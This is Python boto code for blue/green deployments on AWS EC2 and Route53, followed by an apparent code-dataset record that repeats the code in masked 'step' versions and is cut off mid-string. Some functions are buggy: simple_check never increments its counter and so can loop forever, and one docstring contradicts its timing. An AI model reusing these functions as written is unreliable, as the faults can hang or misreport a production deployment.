logging.error('Could not connect to Ec2 with this parameters: %s, %s, <secret key>', region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error('Could not connect to Route53 with this parameters: %s, <secret key>', aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
# Filters instances with specific tag and in specific state.
instances = ec2_conn.get_only_instances(filters={"tag:{0}".format(tag_key): tag_value,
"instance-state-name": instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id, env, instance_name, user_data=None,
instance_size='t2.micro', shutdown='stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
:return: instance ID if created or None
"""
# Checks (by filtering instances currently running) if there is no other instance running with the same tags.
instances = get_specific_instances(ec2_conn, "Environment", env, ["running", "pending"])
if not instances:
# If list is not empty. Creates new instance.
try:
reservations = ec2_conn.run_instances(image_id,
key_name=ssh_key,
user_data=user_data,
instance_type=instance_size,
subnet_id=subnet_id,
security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown,
dry_run=dry_run)
if reservations is not None and not dry_run:
# When instance was created, we have to assign tags.
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.')
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn('New instance would be created and this tags should be assigned')
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime("%d-%m-%Y"))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.')
try:
# Last chance - waiting 1 minute to tag instance.
time.sleep(60)
tag_new_instance(reservations.instances[0], instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
# Looks like there was another instance running with the same tags.
LOGGER.warn('There is another instance running with %s environment tag (id: %s).' % (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
def tag_new_instance(instance, instance_name, environment):
"""
:description: Tags new instance.
:param
instance: Instance that should be tagged.
instance_name: Name of the instance.
environment: blue org green.
:return: None
"""
instance.add_tag('Name', instance_name)
instance.add_tag('Environment', environment)
instance.add_tag('Deployment Date', time.strftime("%d-%m-%Y"))
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
:description: Stops past live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
# Gets past live instance.
instances = get_specific_instances(aws_connection.get('ec2'), "Environment", env, "running")
if check_which_is_live(aws_connection.get('route53'), domain, live_alias) != (env + "." + domain) and instances:
# Instance is not live
try:
aws_connection.get('ec2').stop_instances(instance_ids=[instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn('Instance %s would be stopped and tagged with Environment:%s' % (instances[0].id, tag))
result = True
else:
if dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error('Could not stop the old instance. It looks like it is live or doesnt exist. '
'I tried to stop %s instance.' % env)
return result
def check_which_is_live(route53_conn, domain, live_alias):
"""
:description: Checks which alias (blue.<domain> or green.<domain>) is live.
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
live_alias: Your external DNS record pointing to live web server.
:return: fqdn of live sub alias (blue or green)
"""
live_fqdn = route53_conn.get_zone(domain).get_a(live_alias).alias_dns_name
return live_fqdn
def get_env(fqdn, domain):
"""
:description: Give you environment from given fqdn by removing domain from fqdn.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace("." + domain, "")
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
future_alias: blue.<domain> or green.<domain> depends which is going to be live.
zone: handle to zone that hosts dns records.
records: sets of dns records from the zone..
:return: Result of the change (AWS respond).
"""
try:
change = records.add_change(action='UPSERT',
name=live_alias,
ttl=300,
type='A',
alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id,
alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn, hosted_zone_id=zone.id)
if dry_run:
# Dry run
LOGGER.warn('DNS record %s would be updated with %s' %
(live_alias, green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
else:
if current_live == blue_alias:
# Blue was live so now time for Green.
#if simple_check(green_alias):
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
#else:
# LOGGER.error('Staging is not running.')
# sys.exit(1)
else:
# This time Green was live. Blue, are you ready?
#if simple_check(blue_alias):
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
#else:
# LOGGER.error('Staging is not running.')
# sys.exit(1)
return result
def assign_to_staging(route53_conn, domain, current_live, instance_public_ip, live_alias, blue_alias, green_alias,
dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn, hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else green_alias, instance_public_ip, None, zone,
records)
return result
def delete_old_instance(ec2_conn, tag, dry_run=False):
"""
:description: Deletes instance for given tag only if it is stopped
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = False
# Filters instances with tag Environment = old-app and only in stopped state.
instances = get_specific_instances(ec2_conn, ''.join(tag.keys()), ''.join(tag.values()), "stopped")
if len(instances) is 1:
# If there is only 1 instance in that state.
old = instances[0]
LOGGER.debug("I am going to delete %s" % old.id)
try:
deleted_old = ec2_conn.terminate_instances(instance_ids=[old.id], dry_run=dry_run)
# Previous line should return instance that was deleted. Worth to check if it was the one we want to delete.
if deleted_old[0].id == old.id:
LOGGER.info('Deleted %s' % deleted_old[0].id)
result = True
except exception.EC2ResponseError as ex:
if dry_run:
LOGGER.error('Instance %s would be deleted.' % old.id)
else:
LOGGER.error('Something went wrong when deleting old instance.')
LOGGER.error(ex)
else:
# It could be none or multiple instance in that state. Better notify before someone starts complaining.
LOGGER.warn('No old instance or more than 1 instance was found. I hope you are aware of that. Continue.')
result = True # I am returning true because it shouldn't be a big issue
return result
def wait_for_public_ip(ec2_conn, instance_id):
"""
:description: Gets instance's Public IP. Retries every 5 seconds for 30 seconds.
:param
ec2_conn: Connection to AWS EC2 service
instance_id: ID of instance :)
:return: Public IP or exits the script
"""
counter = 0
while counter < 24:
# We are going to check every 10 seconds for 2 minutes.
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
if stg_instance[0].ip_address is None:
# Still not available so wait 5 seconds.
time.sleep(10)
else:
# We got it!
public_ip = stg_instance[0].ip_address
return str(public_ip)
counter += 1
# Unfortunately we couldn't get Public IP so logging and exiting.
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)
sys.exit(1)
def simple_check(url):
"""
:description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
LOGGER.error("Failed to get respond code from %s - attempt #%s" % (url, counter + 1))
return False
def write_to_file(to_write):
f = open('parameters.properties', 'w')
f.write(to_write)
def switch(region, access_key, secret_key, tag, domain, live_url, blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
# 1. Connects to AWS
aws_conn = connect_to_aws(region, access_key, secret_key)
# 2. Check which is live at the moment and which should be stopped.
live = check_which_is_live(aws_conn.get('route53'), domain, live_url)
# 3. Swap DNS
result = swap_live_with_staging(aws_conn, domain, live, live_url, blue_alias, green_alias, dry_run)
# 4. Stop and tag old one. We will do it after 5 minutes to give chance to safely close all connections.
time.sleep(300)
stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag, dry_run)
return result
def roll_back(region, access_key, secret_key, tag, domain, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
# 1. Connects to AWS
aws_conn = connect_to_aws(region, access_key, secret_key)
# 2. Get instance ID of old instance. Check which environment is live.
old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.keys()), ''.join(tag.values()),
['stopped', 'running'])
current_live = check_which_is_live(aws_conn.get('route53'), domain, live_alias)
env = get_env(current_live, domain)
# 3. Do the Magic ;)
if not old_instance:
LOGGER.error('No instance with tag %s was found. No chance to roll back Sir!' % ''.join(tag.values()))
else:
try:
if dry_run:
LOGGER.warning('Instance %s would be started and tagged with %s' % (old_instance, env))
else:
# Start old instance
old_instance[0].start()
tag_instance(old_instance[0], 'Environment', 'blue' if env == 'green' else 'green')
# Refresh its public IP as it could change.
instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'), old_instance[0].id)
assign_to_staging(aws_conn.get('route53'), domain, current_live, instance_public_ip, live_alias,
blue_alias, green_alias, dry_run=False)
swap_live_with_staging(aws_conn, domain, current_live, live_alias, blue_alias, green_alias, dry_run)
stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)
except exception.EC2ResponseError:
LOGGER.error('Could not start %s instance.' % old_instance)
result = False
return result
def deployment_stage(region, access_key, secret_key, srv_name, domain, live_url, blue_alias, green_alias, tag, image_id,
ssh_key, sec_group, subnet_id, instance_size, shutdown, dry_run=False):
"""
:description: Delivers new instance with staging dns (blue / green).
:param
region: region to which you want to deploy your instance
access_key: AWS Access Key
secret_key: AWS Secret Key
srv_name: How you want to call your web server
domain: Your domain
live_url: DNS record for your live website
blue_url: Blue Url
green_url: Green Url
old_tag: Dictionary with <tag_name> <tag_value> pair
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
:return: string with url and ip address to staging server
"""
# 1. Connects to AWS
aws_connections = connect_to_aws(region, access_key, secret_key)
# 2. Delete old instance which should be stopped
deleted = delete_old_instance(aws_connections.get('ec2'), tag, dry_run)
# 3. Check which environment (blue/green) is live
live = check_which_is_live(aws_connections.get('route53'), domain, live_url)
if live == blue_alias:
env = 'green'
else:
env = 'blue'
# 4. If deleted then we can create new instance
if dry_run:
# Dry Run
create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env, srv_name, None,
instance_size, shutdown, dry_run)
assign_to_staging(aws_connections.get('route53'), domain, live, "127.0.0.1", live_url, blue_alias,
green_alias, dry_run)
sys.exit(0)
elif deleted:
staging_instance = create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env,
srv_name, None, instance_size, shutdown, dry_run)
# 5. Assign right dns alias only if we managed to create instance in previous step
if staging_instance is None:
# There were some problems with creating new instance
LOGGER.error('Could not create new instance.')
sys.exit(1)
else:
# Everything was all right. Waiting for Public IP
if staging_instance[0].ip_address is None:
# Unfortunately Public IP is not available straight away so we have to wait for it.
public_ip = wait_for_public_ip(aws_connections.get('ec2'), staging_instance[0].id)
if public_ip is None:
LOGGER.error('Cannot get Public IP from instance %s' % staging_instance[0].id)
sys.exit(1)
else:
# Or maybe it is? :)
public_ip = staging_instance[0].ip_address
assign_to_staging(aws_connections.get('route53'), domain, live, public_ip, live_url, blue_alias, green_alias,
dry_run)
write_to_file("staging-server = " + public_ip)
return str(env + "." + domain + ": " + public_ip)
LOGGER = set_up_logging(log_path, file_name)
|
flexible
|
{
"blob_id": "dc928da92dc7e8a37a7f32dd4a579fd09b89eb01",
"index": 4955,
"step-1": "<mask token>\n\n\ndef swap_dns(live_alias, future_value, alias_dns_name, zone, records):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n live_alias: Your external DNS record pointing to live web server.\n future_alias: blue.<domain> or green.<domain> depends which is going to be live.\n zone: handle to zone that hosts dns records.\n records: sets of dns records from the zone..\n :return: Result of the change (AWS respond).\n \"\"\"\n try:\n change = records.add_change(action='UPSERT', name=live_alias, ttl=\n 300, type='A', alias_dns_name=alias_dns_name,\n alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)\n change.add_value(future_value)\n result = records.commit()\n except Exception as ex:\n LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (\n live_alias, ex))\n sys.exit(1)\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connect_to_aws(region, aws_access_key, aws_secret_key):\n \"\"\"\n :param:\n region: AWS region\n aws_access_key: AWS Access Key\n aws_secret_key: AWS Secret Key\n :return: map of aws services and connection handles for them.\n \"\"\"\n ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=\n aws_access_key, aws_secret_access_key=aws_secret_key)\n route53_conn = route53.Route53Connection(aws_access_key_id=\n aws_access_key, aws_secret_access_key=aws_secret_key)\n if ec2_conn is None:\n logging.error(\n 'Could not connect to Ec2 with this parameters: %s, %s, <secret key>'\n , region, aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS EC2 [%s]', region)\n if route53_conn is None:\n logging.error(\n 'Could not connect to Route53 with this parameters: %s, <secret key>'\n , aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS Route53')\n return {'ec2': ec2_conn, 'route53': route53_conn}\n\n\ndef get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):\n \"\"\"\n :description: Returns requested instance - uses filters to get it.\n :param\n ec2_conn: Connections to AWS EC2.\n tag_key: Name of the tag.\n tag_value: Value of the tag.\n instance_state: One of three states - \"running\" / \"pending\" / \"stopped\".\n :return: boolean result.\n \"\"\"\n instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(\n tag_key): tag_value, 'instance-state-name': instance_state})\n return instances\n\n\ndef create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,\n env, instance_name, user_data=None, instance_size='t2.micro', shutdown=\n 'stop', dry_run=False):\n \"\"\"\n :param\n ec2_conn: connection to AWS EC2 service\n image_id: Amazon Machine Image ID with all your software\n ssh_key: AWS key pair name\n sec_group: Security group ID that should be allocated\n subnet_id: Subnet ID in which your instance should be created\n env: Environment (blue / green / old_app)\n instance_name: Name tag value\n user_data: Cloud-Init script that will run once\n instance_size: String with instance size\n shutdown_behaviour: stop or termination\n dry-run: True or False. If True, it will not make any changes.\n :return: instance ID if created or None\n \"\"\"\n instances = get_specific_instances(ec2_conn, 'Environment', env, [\n 'running', 'pending'])\n if not instances:\n try:\n reservations = ec2_conn.run_instances(image_id, key_name=\n ssh_key, user_data=user_data, instance_type=instance_size,\n subnet_id=subnet_id, security_group_ids=sec_group,\n instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)\n if reservations is not None and not dry_run:\n tag_new_instance(reservations.instances[0], instance_name, env)\n else:\n LOGGER.error('Something went wrong when creating new instance.'\n )\n sys.exit(1)\n except exception.EC2ResponseError:\n if dry_run:\n LOGGER.warn(\n 'New instance would be created and this tags should be assigned'\n )\n LOGGER.warn('Name: %s' % instance_name)\n LOGGER.warn('Environment: %s' % env)\n LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))\n return 'OK'\n else:\n LOGGER.error('Something went wrong when creating new instance.'\n )\n try:\n time.sleep(60)\n tag_new_instance(reservations.instances[0],\n instance_name, env)\n except exception.EC2ResponseError:\n sys.exit(1)\n else:\n LOGGER.warn(\n 'There is another instance running with %s environment tag (id: %s).'\n % (env, instances[0]))\n return None\n return reservations.instances\n\n\ndef tag_instance(instance, tag_name, tag_key):\n \"\"\"\n :description: Removes old tag and creates new one with updated value.\n :param\n instance: Instance that should be tagged.\n tag_name: Name of the tag.\n tag_key: Value of the tag.\n :return: None\n \"\"\"\n instance.remove_tag('{0}'.format(tag_name))\n instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))\n\n\n<mask token>\n\n\ndef stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):\n \"\"\"\n :description: Stops past live instance.\n :param\n aws_connection: Connections to AWS Route53 service and EC2.\n env: Blue or green depends which instance you want to stop (cross check).\n domain: Your Domain.\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean result.\n \"\"\"\n result = False\n tag = ''.join(tag.values())\n instances = get_specific_instances(aws_connection.get('ec2'),\n 'Environment', env, 'running')\n if check_which_is_live(aws_connection.get('route53'), domain, live_alias\n ) != env + '.' + domain and instances:\n try:\n aws_connection.get('ec2').stop_instances(instance_ids=[\n instances[0].id], dry_run=dry_run)\n tag_instance(instances[0], 'Environment', tag)\n except exception.EC2ResponseError:\n LOGGER.warn(\n 'Instance %s would be stopped and tagged with Environment:%s' %\n (instances[0].id, tag))\n result = True\n elif dry_run:\n LOGGER.warning('Old instance with tag %s would be stopped.' % env)\n else:\n LOGGER.error(\n 'Could not stop the old instance. It looks like it is live or doesnt exist. I tried to stop %s instance.'\n % env)\n return result\n\n\n<mask token>\n\n\ndef get_env(fqdn, domain):\n \"\"\"\n :description: Give you environment from given fqdn by removing domain from fqdn.\n :param\n fqdn: Fully Qualified Domain Name.\n domain: Your domain name.\n :return: environment (blue or green).\n \"\"\"\n env = fqdn.replace('.' + domain, '')\n return env\n\n\ndef swap_dns(live_alias, future_value, alias_dns_name, zone, records):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n live_alias: Your external DNS record pointing to live web server.\n future_alias: blue.<domain> or green.<domain> depends which is going to be live.\n zone: handle to zone that hosts dns records.\n records: sets of dns records from the zone..\n :return: Result of the change (AWS respond).\n \"\"\"\n try:\n change = records.add_change(action='UPSERT', name=live_alias, ttl=\n 300, type='A', alias_dns_name=alias_dns_name,\n alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)\n change.add_value(future_value)\n result = records.commit()\n except Exception as ex:\n LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (\n live_alias, ex))\n sys.exit(1)\n return result\n\n\ndef swap_live_with_staging(aws_connection, domain, current_live, live_alias,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n aws_connection: Connections to AWS Route53 service and EC2\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which is live\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n route53_conn = aws_connection.get('route53')\n zone = route53_conn.get_zone(domain)\n records = route53.record.ResourceRecordSets(connection=route53_conn,\n hosted_zone_id=zone.id)\n if dry_run:\n LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,\n green_alias if current_live == blue_alias else blue_alias))\n result = 'OK'\n elif current_live == blue_alias:\n result = swap_dns(live_alias, green_alias, green_alias, zone, records)\n else:\n result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)\n return result\n\n\ndef assign_to_staging(route53_conn, domain, current_live,\n instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Assigns newly created instance to staging url\n :param\n route53_conn: Connection to AWS Route53 service\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which one was behind your live url.\n instance_public_ip: Public IP of newly created instance that would be assigned to staging url.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n zone = route53_conn.get_zone(domain)\n records = route53.record.ResourceRecordSets(connection=route53_conn,\n hosted_zone_id=zone.id)\n if dry_run:\n LOGGER.warn('Public IP %s would be assigned to %s' % (\n instance_public_ip, live_alias))\n result = 'OK'\n else:\n result = swap_dns(blue_alias if current_live == green_alias else\n green_alias, instance_public_ip, None, zone, records)\n return result\n\n\n<mask token>\n\n\ndef simple_check(url):\n \"\"\"\n :description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.\n :param\n url: link which should be checked\n :return: Boolean\n \"\"\"\n counter = 0\n while counter < 10:\n try:\n r = requests.head('http://' + url)\n LOGGER.debug(r.status_code)\n if r.status_code == 200:\n return True\n else:\n time.sleep(60)\n except requests.ConnectionError:\n LOGGER.error('Failed to get respond code from %s - attempt #%s' %\n (url, counter + 1))\n return False\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef read_config_file(logger):\n import aws_config\n try:\n domain = getattr(aws_config, 'domain')\n config = {'reg': getattr(aws_config, 'region'), 'access': getattr(\n aws_config, 'access_key'), 'secret': getattr(aws_config,\n 'secret_key'), 'srv': getattr(aws_config, 'instance_name'),\n 'domain': domain, 'alias': getattr(aws_config,\n 'live_record_name') + '.' + domain, 'image': getattr(aws_config,\n 'ami_id'), 'key': getattr(aws_config, 'key_pair'), 'sec': [\n getattr(aws_config, 'security_group')], 'subnet': getattr(\n aws_config, 'subnet_id'), 'type': getattr(aws_config,\n 'instance_size'), 'shutdown': getattr(aws_config,\n 'shutdown_behavior'), 'dry-run': getattr(aws_config, 'dry_run')}\n except AttributeError as at_err:\n logger.error('Could not read parameters from aws_config.py file. [%s]',\n at_err)\n region = os.environ['AWS_DEFAULT_REGION']\n aws_access_key = os.environ['AWS_ACCESS_KEY_ID']\n aws_secret_key = os.environ['AWS_SECRET_ACCESS_KEY']\n if region is None or aws_access_key is None or aws_secret_key is None:\n logger.error('Could not find AWS credentials in local variables')\n sys.exit(1)\n else:\n logger.info('Got AWS credentials from local variables')\n return config\n\n\n<mask token>\n\n\ndef connect_to_aws(region, aws_access_key, aws_secret_key):\n \"\"\"\n :param:\n region: AWS region\n aws_access_key: AWS Access Key\n aws_secret_key: AWS Secret Key\n :return: map of aws services and connection handles for them.\n \"\"\"\n ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=\n aws_access_key, aws_secret_access_key=aws_secret_key)\n route53_conn = route53.Route53Connection(aws_access_key_id=\n aws_access_key, aws_secret_access_key=aws_secret_key)\n if ec2_conn is None:\n logging.error(\n 'Could not connect to Ec2 with this parameters: %s, %s, <secret key>'\n , region, aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS EC2 [%s]', region)\n if route53_conn is None:\n logging.error(\n 'Could not connect to Route53 with this parameters: %s, <secret key>'\n , aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS Route53')\n return {'ec2': ec2_conn, 'route53': route53_conn}\n\n\ndef get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):\n \"\"\"\n :description: Returns requested instance - uses filters to get it.\n :param\n ec2_conn: Connections to AWS EC2.\n tag_key: Name of the tag.\n tag_value: Value of the tag.\n instance_state: One of three states - \"running\" / \"pending\" / \"stopped\".\n :return: boolean result.\n \"\"\"\n instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(\n tag_key): tag_value, 'instance-state-name': instance_state})\n return instances\n\n\ndef create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,\n env, instance_name, user_data=None, instance_size='t2.micro', shutdown=\n 'stop', dry_run=False):\n \"\"\"\n :param\n ec2_conn: connection to AWS EC2 service\n image_id: Amazon Machine Image ID with all your software\n ssh_key: AWS key pair name\n sec_group: Security group ID that should be allocated\n subnet_id: Subnet ID in which your instance should be created\n env: Environment (blue / green / old_app)\n instance_name: Name tag value\n user_data: Cloud-Init script that will run once\n instance_size: String with instance size\n shutdown_behaviour: stop or termination\n dry-run: True or False. If True, it will not make any changes.\n :return: instance ID if created or None\n \"\"\"\n instances = get_specific_instances(ec2_conn, 'Environment', env, [\n 'running', 'pending'])\n if not instances:\n try:\n reservations = ec2_conn.run_instances(image_id, key_name=\n ssh_key, user_data=user_data, instance_type=instance_size,\n subnet_id=subnet_id, security_group_ids=sec_group,\n instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)\n if reservations is not None and not dry_run:\n tag_new_instance(reservations.instances[0], instance_name, env)\n else:\n LOGGER.error('Something went wrong when creating new instance.'\n )\n sys.exit(1)\n except exception.EC2ResponseError:\n if dry_run:\n LOGGER.warn(\n 'New instance would be created and this tags should be assigned'\n )\n LOGGER.warn('Name: %s' % instance_name)\n LOGGER.warn('Environment: %s' % env)\n LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))\n return 'OK'\n else:\n LOGGER.error('Something went wrong when creating new instance.'\n )\n try:\n time.sleep(60)\n tag_new_instance(reservations.instances[0],\n instance_name, env)\n except exception.EC2ResponseError:\n sys.exit(1)\n else:\n LOGGER.warn(\n 'There is another instance running with %s environment tag (id: %s).'\n % (env, instances[0]))\n return None\n return reservations.instances\n\n\ndef tag_instance(instance, tag_name, tag_key):\n \"\"\"\n :description: Removes old tag and creates new one with updated value.\n :param\n instance: Instance that should be tagged.\n tag_name: Name of the tag.\n tag_key: Value of the tag.\n :return: None\n \"\"\"\n instance.remove_tag('{0}'.format(tag_name))\n instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))\n\n\n<mask token>\n\n\ndef stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):\n \"\"\"\n :description: Stops past live instance.\n :param\n aws_connection: Connections to AWS Route53 service and EC2.\n env: Blue or green depends which instance you want to stop (cross check).\n domain: Your Domain.\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean result.\n \"\"\"\n result = False\n tag = ''.join(tag.values())\n instances = get_specific_instances(aws_connection.get('ec2'),\n 'Environment', env, 'running')\n if check_which_is_live(aws_connection.get('route53'), domain, live_alias\n ) != env + '.' + domain and instances:\n try:\n aws_connection.get('ec2').stop_instances(instance_ids=[\n instances[0].id], dry_run=dry_run)\n tag_instance(instances[0], 'Environment', tag)\n except exception.EC2ResponseError:\n LOGGER.warn(\n 'Instance %s would be stopped and tagged with Environment:%s' %\n (instances[0].id, tag))\n result = True\n elif dry_run:\n LOGGER.warning('Old instance with tag %s would be stopped.' % env)\n else:\n LOGGER.error(\n 'Could not stop the old instance. It looks like it is live or doesnt exist. I tried to stop %s instance.'\n % env)\n return result\n\n\n<mask token>\n\n\ndef get_env(fqdn, domain):\n \"\"\"\n :description: Give you environment from given fqdn by removing domain from fqdn.\n :param\n fqdn: Fully Qualified Domain Name.\n domain: Your domain name.\n :return: environment (blue or green).\n \"\"\"\n env = fqdn.replace('.' + domain, '')\n return env\n\n\ndef swap_dns(live_alias, future_value, alias_dns_name, zone, records):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n live_alias: Your external DNS record pointing to live web server.\n future_alias: blue.<domain> or green.<domain> depends which is going to be live.\n zone: handle to zone that hosts dns records.\n records: sets of dns records from the zone..\n :return: Result of the change (AWS respond).\n \"\"\"\n try:\n change = records.add_change(action='UPSERT', name=live_alias, ttl=\n 300, type='A', alias_dns_name=alias_dns_name,\n alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)\n change.add_value(future_value)\n result = records.commit()\n except Exception as ex:\n LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (\n live_alias, ex))\n sys.exit(1)\n return result\n\n\ndef swap_live_with_staging(aws_connection, domain, current_live, live_alias,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live 